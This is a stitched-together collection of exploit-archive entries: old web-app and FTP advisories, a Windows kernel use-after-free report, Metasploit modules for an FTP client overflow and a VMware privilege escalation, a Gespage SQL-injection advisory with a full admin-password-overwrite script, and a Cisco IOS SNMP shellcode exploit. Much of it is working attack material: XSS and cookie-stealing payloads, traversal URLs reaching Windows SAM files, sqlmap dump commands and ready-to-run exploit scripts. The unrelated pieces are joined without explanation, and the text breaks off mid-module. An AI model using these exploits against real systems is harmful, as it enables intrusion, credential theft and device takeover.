Cross Site Scripting Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. This issue can be exploited by constructing a malicious URL containing embedded script code as a 'help.php' parameter. When an unsuspecting user follows the link sensitive information, such as cookie-based authentication credentials may be obtained by the attacker.
Plaintext Password Weakness:
A weakness has been discovered in PHP TopSites. It has been reported that user's passwords are stored in plaintext and thus are visible to TopSites administrators. This poses a security risk as TopSite script users may use the same passwords on other systems.
SQL Injection Vulnerability:
A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in database information being disclose to an attacker.
Solution:
Upgrade to the current version of php topsites
Proof Of Conecpt Exploit:
iTop10.net phpTopsites Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team. And The CyberArmy ACAT Team.
- https://www.securityfocus.com/bid/6625/info
http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber--
- https://www.securityfocus.com/bid/6623/info
- https://www.securityfocus.com/bid/6622/info
http://www.example.com/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
- https://www.securityfocus.com/bid/6621/info
<body onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">
<body onLoad="window.open('http://attackerswebsite/launcher.htm')">
WinMX Design Error
Vendor: Frontcode Technologies
Product: WinMX
Version: <= 2.6
Website: http://www.winmx.com/
BID: 7771
Description:
WinMX 2.6 is an older version of the popular file sharing client WinMX. While the current version is 3.31, 2.6 still remains quite popular. Especially amongst users on private networks. I believe this is largely due to the fact that 2.6 does not have the option to output .wsx file (WinMX server list files) This helps keep the addresses for private OpenNap servers out of the hands of uninvited users (amongst other reasons).
Problem:
The problems with WinMX 2.6 is that it provides pretty much NO password protection. This can be exploited both locally and remotely. Again, I think all of us have seen the bad habit that most people have of using the same password for multiple accounts etc etc.
Local Exploitation:
There several ways to exploit this issue locally. One is to just edit a particular server, and upon doing so the username and pass are presented in plaintext, and the other way is to open the nservers.dat file in the WinMX directory.
Remote Exploitation:
Even though the passwords are encrypted by such servers as SlavaNap etc, they are passed to the server in plaintext, so any malicious server owner with a packet sniffer can exploit this vuln.
Conclusion:
I realized this issue back when 2.6 was the current release, but never reported it because VERY shortly thereafter a new version of WinMX was available. However with the substantial number of 2.6 users still around I felt it was best that this vulnerability become official, as there is nothing about it on google etc that i was able to find. So to anyone using 2.6 i offer this advice. Do not use a password for WinMX 2.6 that you use for other accounts at the very least. Hope this helps some of the 2.6 users out. Cheers
Solution:
Upgrade to the latest version of WinMX
Credits:
James Bercegay of the GulfTech Security Research Team.
FTP Service Multiple Vulnerabilities
Vendor: Pablo Software Solutions
Product: FTP Service
Version: <= 1.2
Website: http://www.pablovandermeer.nl/ftp_service.html
BID: 7799 7801
Description:
FTPService.exe is a service-version of Pablo's FTP Server. This service enables you to have the FTP server active even when you're not logged into Windows.
Anonymous Access
The anonymous account is by default set to have download access to anything in the C:\ directory. While this can be disabled by simply deleting the anonymous account, it poses a serious threat for anyone not aware of the problem.
ftp://somewhere/windows/repair/sam
In conclusion this application is totally open to complete compromise by default. Vendor was notified and plans on releasing a fix soon.
Plaintext Password Weakness:
User info is stored in users.dat in plaintext. If the anonymous account is present (it is by default) the entire FTP server can be compromised
ftp://somewhere/program files/pablo's ftp service/users.dat
Solution:
Upgrade your version of Pablo FTP Service.
Credits:
James Bercegay of the GulfTech Security Research Team.
Max Web Portal Multiple Vulnerabilities
Vendor: Max Web Portal
Product: Max Web Portal
Version: <= 1.30
Website: http://www.maxwebportal.com
BID: 7837
Description:
MaxWebPortal is a web portal and online community system which includes advanced features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. Easy-to-use and powerful user interface allows members to add news, content, write reviews and share information among other registered users.
Search XSS Vulnerability:
The Max Web Portal search utility is vulnerable to cross site scripting attacks. All an attacker has to do is break out of the input tags and enter thier code of choice such as JS or VBS. Below is an example of this vulnerability.
search.asp?Search="><script>alert(document.cookie)</script>
Remember this vuln as I will later explain how it can be used to aide an attacker to compromise user and admin accounts.
Hidden Form Field weakness:
The Max Web Portal system seems to rely on hidden form fields quite heavily. This is not really a problem if done securely. However any user can perform some admin actions by exploiting the use of these hidden fields. For example, and attacker can deface a Max Web Portal site by clicking the link to start a new topic, saving the html file offline, and making a few changes. By adding the following to the form any post an attacker makes will show up on the front page as a news item. (credits to pivot for finding this one :) )
A field with value=1 name=news
And this will also lock the topic
A field with name="lock" value="1"
Unfortunately this vuln can also be exploited by the scum of the earth (spammers :( ) Below is an example of how a user can send a private message to all members of the particular Max Web Portal driven site
A field with name="allmem" value="true"
There may be other vulns like this that can be exploited. We however quit bothering with looking after these were found. heh
Cookie Authentication Bypass Vulnerability:
Now this is where the earlier XSS vuln could come in very handy to an attacker. Basically, by changing certain values in the cookie file of a Max Portal Website an attacker can assume the identity of anyone, even an admin. This however is only possible if you have the encrypted password of a user. But by using the above XSS vuln or other methods, this can be accomplished quite easily. All an attacker has to do is login as thierselves to obtain a valid sessionid. Then without logging out, close the browser and change thier name and encrypted pass in the cookie to that of the identity they wish to assume. When they return to the site it will then recognize them as the compromised user.
Database Compromise Vulnerability:
This is taken directly from the Max Web Portal readme file explaining the recommended post installation procedure.
"Remember to change the default admin password by clicking on the Profile link in your Control Panel. For additional security, it is recommended to change your database name. example: neptune.mdb"
This is not safe as anyone with a CGI scanner can modify thier list to find a Max Web Portal database. By default the database is located at this url
/database/db2000.mdb
And while it should be removed and placed in a non accessible directory, alot of times it isn't :( This is definately serious, as you do not need to decrypt the pass for it to be any use to you, as I demonstrated earlier.
Password Reset Vulnerability:
This is by far the most serious vuln of them all. While the cookie poisioning vuln will let you log in as anyone, your access is somewhat limited. However, by requesting a forgotten password, an attacker can then save the password reset page offline, edit the member id in the source code to the id number of the desired victim, and reset thier password to one of thier liking, no questions asked. Here is an modified example.
MaxWebPortal Proof of Concept Exploit
This leads to total compromise of the webportal system. An attacker can even write a script in a matter of minutes to reset the entire database to a pass of thier liking. I wrote a script like this during the research of this product but will not be releasing it to the public as im sure it will only be abused.
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.
MegaBrowser Multiple Vulnerabilities
Vendor: Quality Programming Corporation
Product: MegaBrowser
Version: <= 0.71b
Website: http://www.megabrowser.com
BID: 7802 7803
Description:
Megabrowser is a free standalone program that enables you to host websites and FTP sites by utilizing its powerful advanced peer-to-peer features. You can now host websites and FTP sites without paying any hosting fees. Simply store your sites in the directories of your choice on your laptop or personal computer.
Directory Traversal Vulnerability:
MegaBrowser HTTP server is vulnerable to a directory traversal vulnerability which allows access to any file on the system as well as directory viewing of the root web directory
http://www.someplace.com/../../../../../WINNT/repair/sam
http://www.someplace.com/../
FTP User Enumeration Vulnerability:
While not as serious as the previously mentioned vuln, this still poses a threat as it may allow an attacker to harvest a list of valid FTP usernames on the system.
user blah 530 User can't log in user anonymous 331 Anonymous access allowed, send identity (e-mail name) as password
Solution:
Vendor contacted, but never replied. No known solution.
Credits:
James Bercegay of the GulfTech Security Research Team.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6
Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to maintain references to free WND structures.
There are two interesting background posts on CS_OWNDC and CS_CLASSDC here:
https://blogs.msdn.microsoft.com/oldnewthing/20060601-06/?p=31003
https://blogs.msdn.microsoft.com/oldnewthing/20060602-00/?p=30993
Here is a minimal testcase:
$ cat dccache.c
#include <windows.h>
#pragma comment(lib, "user32")
int main(int argc, char **argv) {
WNDCLASSEX WindowClass = {0};
HWND WindowA, WindowB, WindowC;
ATOM Atom;
WindowClass.cbSize = sizeof(WNDCLASSEX);
WindowClass.lpfnWndProc = DefWindowProc;
WindowClass.lpszClassName = "Class";
Atom = RegisterClassEx(&WindowClass);
WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
GetDC(WindowA);
SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
return 0;
}
This might take a while to crash though, something has to cause the list to be traversed (e.g. a new window opens) after the freed memory has changed. It can also crash in some very strange places. We can speed the process up by trying to get the allocation ourselves.
First I need to know the size of a WND structure. If you look at the call to HMAllocObject() in win32kfull!xxxCreateWindowEx, you can see it's 240 bytes:
.text:00081BCC _xxxCreateWindowEx@68 proc near
...
.text:00081EE2 push 240 ; _DWORD
.text:00081EE7 push 1 ; _DWORD
.text:00081EE9 push [ebp+var_12C] ; _DWORD
.text:00081EEF push ebx ; _DWORD
.text:00081EF0 call ds:__imp__HMAllocObject@16 ; HMAllocObject(x,x,x,x)
A well-known trick to get arbitrary sized allocations from the desktop heap is to use SetWindowText(), you just create a WCHAR string of the required length - good enough for testing.
e.g. SetWindowTextW(Window, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...");
So my plan is to create a thread to trigger the free, and then try to steal the allocation. See the testcase attached for my code.
This reliably crashes Windows 10 with version 10.0.15063.674, the crash looks like this:
eax=00410041 ebx=00000010 ecx=95423580 edx=95423580 esi=99464440 edi=954004d0
eip=93fb40d8 esp=9dba78f0 ebp=9dba7910 iopl=0 nv up ei pl nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207
win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba:
93fb40d8 8b403c mov eax,dword ptr [eax+3Ch] ds:0023:0041007d=????????
0: kd> kv
# ChildEBP RetAddr Args to Child
00 9dba7910 93fb2722 00000000 0c6775a3 9dba7b80 win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba (FPO: [Non-Fpo])
01 9dba7afc 93fd1916 0000c1ac 9dba7b74 00000000 win32kfull!xxxCreateWindowEx+0xb56 (FPO: [Non-Fpo])
02 9dba7bc8 81d97397 80000000 0000c1ac 0000c1ac win32kfull!NtUserCreateWindowEx+0x2b0 (FPO: [Non-Fpo])
03 9dba7bc8 77104350 80000000 0000c1ac 0000c1ac nt!KiSystemServicePostCall (FPO: [0,3] TrapFrame @ 9dba7c14)
04 0073f0b8 7497485a 74bae418 80000000 0000c1ac ntdll!KiFastSystemCallRet (FPO: [0,0,0])
05 0073f0bc 74bae418 80000000 0000c1ac 0000c1ac win32u!NtUserCreateWindowEx+0xa (FPO: [17,0,0])
06 0073f394 74badcff 0073f3e0 00000000 80000000 USER32!VerNtUserCreateWindowEx+0x22b (FPO: [Non-Fpo])
07 0073f468 74baeaf8 00cc1010 00000000 80000000 USER32!CreateWindowInternal+0x153 (FPO: [Non-Fpo])
08 0073f4a8 00cb1173 00000000 0000c1ac 00cc1010 USER32!CreateWindowExA+0x38 (FPO: [Non-Fpo])
So let's dump the DC Cache and see what it looks like, an entry looks something like:
typedef struct _DCE {
PDCE pdceNext;
HANDLE hDC;
PWND pwndOrg;
PWND pwndClip;
...
} DCE, *PDCE;
# Make $t0 gpDispInfo->pdceFirst
0: kd> r $t0=poi(poi(win32kbase!gpDispInfo)+8)
# Now dump the whole list:
0: kd> .while (@$t0) { .printf "dce %p ->pwndOrg %p\n",@$t0,poi(@$t0+8); r @$t0=poi(@$t0) }
dce 99464440 ->pwndOrg 95423580
dce 922140e8 ->pwndOrg 00000000
dce 9239d638 ->pwndOrg 00000000
dce 9239beb0 ->pwndOrg 00000000
dce 99510540 ->pwndOrg 9541ede8
dce 92274178 ->pwndOrg 954004d0
dce 9223d2b0 ->pwndOrg 954004d0
dce 922050e8 ->pwndOrg 945504d0
So my theory is that one of these WND pointers is actually a bad reference, and
look at this:
0: kd> du 95423580
95423580 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
954235c0 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
95423600 "AAAAAAAAAAA"
There is the text I set via SetWindowText().
(The testcase I sent Microsoft triggered a couple of other BSOD I want fixed as well. I'm hoping whoever gets assigned this bug will just fix them, they're dead easy oneline fixes).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43446.zip
Snitz Forums 2000 Multiple Vulnerabilities
Vendor: Snitz Communications
Product: Snitz Forums 2000
Version: <= 3.4.0.3
Website: http://www.snitz.com
BID: 7922 7924 7925
CVE: CAN-2003-0492 CAN-2003-0493 CAN-2003-0494
Description:
Snitz Forums is a full-featured UBB-style ASP discussion board application. New features in version 3.3: Complete Topic/Post Moderation, Topic Archiving, Subscribe to Board / Category / Forum / Topic, Improved unsubscribe, Short(er) urls, Category and Forum ordering, and Improved Members-page. And like always, upgrading of the database is done for you by the setupscript
Search XSS Vulnerability:
Snitz search feature is vulnerable to XSS which can aide an attacker in stealing cookies, and thus compromising the account, as described below
search.asp?Search="><script>alert(document.cookie)</script>
Cookie Authentication Bypass Vulnerability:
In order to steal another users identity, all an attacker needs to know is thier encrypted password. This is not very hard to obtain using the XSS as described above, or other methods. Once an attacker has this info, all they have to do is login to thier normal account to get a valid session id, close the browser, replace thier username and encrypted pass with that of the victim, and return to the site where they will be recognized as the victim.
Password Reset Vulnerability:
This is the most serious of the vulns, as it requries no real effort and leaves the entire snitz forum open to attack. All an attacker has to do is request a forgotten password, save the password reset page offline,edit the member id to the desired member id, and submit the form. The members password will then be reset to that of the attackers choosing.
Proof Of Concept:
Snitz Forums 2000 Proof Of Concept
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Ayukov NFTP FTP Client Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
code exeuction under the context of the user if successfully exploited.
},
'Author' =>
[
'Berk Cem Goksel', # Original exploit author
'Daniel Teixeira', # MSF module author
'sinn3r' # RCA, improved module reliability and user exp
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-15222'],
[ 'EDB', '43025' ],
],
'Payload' =>
{
'BadChars' => "\x00\x01\x0a\x10\x0d",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'Oct 21 2017',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
])
end
def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end
srv_port = datastore['SRVPORT']
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
print_status("#{client.peerhost} - connected")
# Let the client log in
client.get_once
print_status("#{client.peerhost} - sending 331 OK")
user = "331 OK.\r\n"
client.put(user)
client.get_once
print_status("#{client.peerhost} - sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
# It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
# is visible from the user's command prompt, which would make the buffer overflow attack too
# obvious.
sploit = "\x20"*4116
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
sploit << "\r\n"
print_status("#{client.peerhost} - sending the malicious response")
client.put(sploit)
client.get_once
pwd = "257\r\n"
client.put(pwd)
client.get_once
end
end
# [CVE-2017-7997] Gespage SQL Injection vulnerability
## Description
Gespage is a web solution providing a printer portal. Official Website:
http://www.gespage.com/
The web application does not properly filter several parameters sent by
users, allowing authenticated SQL code injection (Stacked Queries -
comment).
These vulnerabilities could allow attackers to retrieve / update data
from the database through the application.
**CVE ID**: CVE-2017-7997
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 8.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
### Proof of Concept (dumping database data)
The parameters of these following pages are vulnerable:
* Page: http://URL/ges/webapp/users/prnow.jsp
Parameter: show_prn
HTTP Method: Post
* Page: http://URL/ges/webapp/users/blhistory.jsp
Parameter: show_month
HTTP Method: Post
* Page: http://URL/ges/webapp/users/prhistory.jsp
Parameter: show_month
HTTP Method: Post
We can then detect the SQL Injection by requesting the server with the
curl tool, including a simple payload executing a sleep of different
seconds:
* Normal request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time:0,122
```
* Sleep Injection of 3 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(3)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time: 3,126
```
* Sleep Injection of 6 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d
"show_prn=1');SELECT PG_SLEEP(6)--"
https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure -w
"\nResponse Time:%{time_total}\n"
Curl output: Response Time: 6,126
```
We created a dedicated python script to change the web admin password in
order to compromise the web application:
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$ python update_gespage_pwd.py -c e06d40bc855c98751a5a2ff49daa -i
http://192.168.160.128:7180/gespage -p 12345
[+] Generating the new admin password hash
=> Password hash (sha1) to inject in the Database:
8cb2237d0679ca88db6464eac60da96345513964
[+] Verifying connection to the web interface:
http://192.168.160.128:7180/gespage/
=> Connection OK
[+] Exploiting the SQL injection
=> Vulnerable page:
http://192.168.160.128:7180/gespage/webapp/users/prnow.jsp
=> Posting Data : show_prn=A-PRINTER-ON-THE-WEB-LIST');UPDATE
param_gespage SET param_value='8cb2237d0679ca88db6464eac60da96345513964'
WHERE param_id='admin_pwd'--
[+] Go to the web admin interface, http://192.168.160.128:7180/admin/
and log on with admin:12345
"""
from argparse import ArgumentParser
from hashlib import sha1
from requests import Session
from urllib3 import disable_warnings
def exploit(args):
if args.ip_url[-1] != "/":
args.ip_url += "/"
print "[+] Generating the new admin password hash"
new_admin_pwd_hash = sha1(args.password).hexdigest()
print " => Password hash (sha1) to inject in the Database: %s" %
(new_admin_pwd_hash)
print "[+] Verifying connection to the web interface: %s" %
(args.ip_url)
web_session = web_connection(args.ip_url, args.cookie)
print "[+] Exploiting the SQL injection"
sql_injection(args.ip_url, web_session, args.cookie, new_admin_pwd_hash)
print "[+] Go to the web admin interface, %s and log on with
admin:%s" % (args.ip_url.replace('gespage', 'admin'), args.password)
def sql_injection(url, session, user_cookie, new_admin_pwd_hash):
vulnerable_url = url + "webapp/users/prnow.jsp"
sql_update_query = "UPDATE param_gespage SET param_value='%s' WHERE
param_id='admin_pwd'" % (new_admin_pwd_hash)
sql_injection_payload = "A-PRINTER-ON-THE-WEB-LIST');%s--" %
(sql_update_query)
print " => Vulnerable page: %s" % (vulnerable_url)
print " => Posting Data : show_prn=%s" %(sql_injection_payload)
response = session.post(vulnerable_url,
cookies={"JSESSIONID":user_cookie}, verify=False, allow_redirects=True,
data={"show_prn":sql_injection_payload})
if not response.status_code == 200:
print " There is an error while posting the payload, try with
sqlmap.py"
exit(2)
def web_connection(url, user_cookie):
disable_warnings()
session = Session()
response = session.get(url, verify=False, allow_redirects=False,
cookies={"JSESSIONID":user_cookie})
if (response.status_code == 302 and "webapp/user_main.xhtml" in
response.text):
print " => Connection OK"
return session
else:
print " /!\ Error while connecting the web interface with the
specified JSESSIONID cookie"
print " => Make sure given application URL and JSESSIONID
cookie are correct "
exit(1)
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit Gespage SQL injection
by updating the admin password. You must create then specify an existing
user in order to exploit the vulnerability')
parser.add_argument('-i','--ip_url', help='The web interface URL,
ex: http://IP_ADDRESS:7181/gespage/',required=True)
parser.add_argument('-c','--cookie', help='JSESSIONID cookie of an
authenticated user',required=True)
parser.add_argument('-p','--password', help='New admin
password',required=True)
exploit(parser.parse_args())
```
Using [sqlmap](https://github.com/sqlmapproject/sqlmap), it is also
possible to dump the content of the database, write other data, etc.
Dumping the admin password hash (if changed from the initial 123456
password):
```
python sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOUR_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T param_gespage -C param_value
--time-sec 2 --dump --flush-session
```
Dumping the users table:
```
sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOU_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T users --time-sec 2 --dump
```
## Timeline (dd/mm/yyyy)
* 06/03/2017 : Initial discovery
* 13/03/2017 : First contact attempt (Web form)
* 21/04/2017 : Second contact attempt (public e-mail address)
* 23/06/2017 : Phone call and successful e-mail contact
* 23/06/2017 : Technical details sent to the editor
* 20/07/2017 : No reply, follow-up e-mail
* 27/07/2017 : Reply: fix planned for major release 7.5.0 in late September
* 17/09/2017 : Informing the editor that we would publish in October
* 3/10/2017 : Feedback from Gespage informing us that the issue has been
fixed with version 7.4.9.
* 02/01/2018 : Release of the advisory
## Fixes
Upgrade to Gespage 7.4.9
## Affected versions
* Versions up to 7.4.8
## Credits
* Mickael KARATEKIN <m.karatekin@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
#!/usr/bin/env python
if False: '''
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution
===================
This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp>
Description
-------------
RCE exploit code is available for Cisco Integrated Service Router 2811. This exploit is firmware dependent. The latest firmware version is supported:
- Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM Monitor version:
- System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)
Read-only community string is required to trigger the vulnerability.
Shellcode
------------
The exploit requires shellcode as HEX input. This repo contains an example shellcode for bypassing authentication in telnet service and in enable prompt. Shellcode to revert changes is also available. If you want to write your own shellcode feel free to do so. Just have two things in mind:
- Don't upset the watchdog by running your code for too long. Call a sleep function once in a while.
- Return execution flow back to SNMP service at the end. You can use last opcodes from the demo shellcode:
```
3c1fbfc4 lui $ra, 0xbfc4
37ff89a8 ori $ra, $ra, 0x89a8
03e00008 jr $ra
00000000 nop
```
Usage example
-------------
```
$ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
Writing shellcode to 0x8000f000
.
Sent 1 packets.
0x8000f0a4: 8fb40250 lw $s4, 0x250($sp)
.
Sent 1 packets.
0x8000f0a8: 00000000 nop
.
Sent 1 packets.
0x8000f0ac: 3c163e29 lui $s6, 0x3e29
.
Sent 1 packets.
0x8000f0b0: 36d655b0 ori $s6, $s6, 0x55b0
```
Notes
-----------
Firmware verson can be read via snmpget command:
```
$ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team
```
Author
------
Artem Kondratenko https://twitter.com/artkond
## Shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
## unset_shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000003c1480003694f0008e96000000000000aeb60000000000003c1fbfc437ff89a803e0000800000000
'''
from scapy.all import *
from time import sleep
from struct import pack, unpack
import random
import argparse
import sys
from termcolor import colored
try:
cs = __import__('capstone')
except ImportError:
pass
def bin2oid(buf):
return ''.join(['.' + str(unpack('B',x)[0]) for x in buf])
def shift(s, offset):
res = pack('>I', unpack('>I', s)[0] + offset)
return res
alps_oid = '1.3.6.1.4.1.9.9.95.1.3.1.1.7.108.39.84.85.195.249.106.59.210.37.23.42.103.182.75.232.81{0}{1}{2}{3}{4}{5}{6}{7}.14.167.142.47.118.77.96.179.109.211.170.27.243.88.157.50{8}{9}.35.27.203.165.44.25.83.68.39.22.219.77.32.38.6.115{10}{11}.11.187.147.166.116.171.114.126.109.248.144.111.30'
shellcode_start = '\x80\x00\xf0\x00'
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("host", type=str, help="host IP")
parser.add_argument("community", type=str, help="community string")
parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
args = parser.parse_args()
sh_buf = args.shellcode.replace(' ','').decode('hex')
print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))
if 'capstone' in sys.modules:
md = cs.Cs(cs.CS_ARCH_MIPS, cs.CS_MODE_MIPS32 | cs.CS_MODE_BIG_ENDIAN)
for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
s0 = bin2oid(sh_dword) # shellcode dword
s1 = bin2oid('\x00\x00\x00\x00')
s2 = bin2oid('\xBF\xC5\xB7\xDC')
s3 = bin2oid('\x00\x00\x00\x00')
s4 = bin2oid('\x00\x00\x00\x00')
s5 = bin2oid('\x00\x00\x00\x00')
s6 = bin2oid('\x00\x00\x00\x00')
ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
s0_2 = bin2oid(shift(shellcode_start, k * 4))
ra_2 = bin2oid('\xbf\xc7\x08\x60')
s0_3 = bin2oid('\x00\x00\x00\x00')
ra_3 = bin2oid('\xBF\xC3\x86\xA0')
payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)
send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
if 'capstone' in sys.modules:
for i in md.disasm(sh_dword, cur_addr):
color = 'green'
print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
else:
print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))
sleep(1)
ans = raw_input("Jump to shellcode? [yes]: ")
if ans == 'yes':
ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
zero = bin2oid('\x00\x00\x00\x00')
payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
print 'Jump taken!'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in VMware Workstation Pro and
Player on Linux which allows users to escalate their privileges by
using an ALSA configuration file to load and execute a shared object
as root when launching a virtual machine with an attached sound card.
This module has been tested successfully on VMware Player version
12.5.0 on Debian Linux.
},
'References' =>
[
[ 'CVE', '2017-4915' ],
[ 'EDB', '42045' ],
[ 'BID', '98566' ],
[ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
],
'License' => MSF_LICENSE,
'Author' =>
[
